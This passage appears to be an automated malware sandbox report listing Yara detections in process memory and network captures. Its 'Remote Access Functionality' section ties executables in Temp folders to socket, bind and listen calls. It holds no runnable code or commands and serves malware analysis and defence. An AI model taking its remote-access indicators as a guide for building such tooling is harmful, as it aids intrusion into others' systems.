Source: Yara match File source: 00000007.00000003.2576907728.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2520611019.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2657437696.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2543919841.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2545054746.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2543892695.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2717480504.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2657790629.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2497346871.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2684316064.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2545193277.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2630205909.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: 2ada66c192.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ACEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_00ACEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ACDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_00ACDF51
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_006F1204
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_006F1806